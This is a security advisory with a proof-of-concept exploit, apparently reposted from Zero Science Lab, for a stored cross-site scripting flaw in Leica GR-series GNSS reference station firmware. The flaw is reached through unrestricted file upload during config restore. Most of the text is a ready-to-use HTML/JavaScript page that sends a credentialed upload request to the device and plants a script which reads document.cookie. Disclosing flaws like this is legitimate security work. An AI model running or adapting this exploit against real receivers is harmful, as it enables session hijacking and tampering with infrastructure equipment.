Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection

2019.01.10
mk Gjoko 'LiquidWorm' Krstic (MK) mk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-94

<-- Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection Vendor: Leica Geosystems AG Product web page: https://www.leica-geosystems.com Affected version: 4.30.063 4.20.232 4.11.606 3.22.1818 3.10.1633 2.62.782 1.00.395 Summary: The Leica GR10 is the next generation GNSS reference station receiver that combines the latest state-of-the-art technologies with a streamlined 'plug and play' workflow. Designed for a wide variety of GNSS reference station applications, the Leica GR10 offers new levels of simplicity, reliability and performance. Desc: The application suffers from a stored XSS vulnerability. The issue is triggered via unrestricted file upload while restoring a config file allowing the attacker to upload an html or javascript file that will be stored in /settings/poc.html. This can be exploited to execute arbitrary HTML or JS code in a user's browser session in context of an affected site. Tested on: BarracudaServer.com (WindowsCE) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5503 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5503.php Ref: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php 18.12.2018 --> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.1.17\/upload_config\/", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryKW8wlraBygxiEQyo"); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryKW8wlraBygxiEQyo\r\n" + "Content-Disposition: form-data; name=\"file\"; filename=\"xss.html\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\n" + "\x3chtml\x3e\r\n" + "\x3chead\x3e\r\n" + "\x3ctitle\x3eHTMLi\x3c/title\x3e\r\n" + "\x3c/head\x3e\r\n" + "\x3cbody\x3e\r\n" + "\x3cscript\x3econfirm(document.cookie)\x3c/script\x3e\r\n" + "\x3c/body\x3e\r\n" + "\x3c/html\x3e\n" + "\n" + "\r\n" + "------WebKitFormBoundaryKW8wlraBygxiEQyo--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Init" onclick="submitRequest();" /> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top